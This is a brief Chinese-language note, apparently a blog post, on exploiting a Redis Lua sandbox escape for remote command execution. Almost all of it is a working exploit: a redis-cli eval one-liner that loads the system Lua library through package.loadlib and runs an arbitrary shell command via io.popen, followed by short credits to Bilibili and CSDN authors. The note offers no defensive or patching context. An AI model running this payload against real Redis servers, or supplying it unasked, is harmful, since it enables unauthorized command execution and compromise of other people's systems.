前言
Redis利用沙盒逃逸漏洞实现远程命令执行
exp
<shell>:远程执行的Shell命令
1
2
| redis-cli -h <host>
127.0.0.1:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("<shell>", "r"); local res = f:read("*a"); f:close(); return res' 0
|
完成
参考文献
哔哩哔哩——xiaodisec
CSDN——7562ajj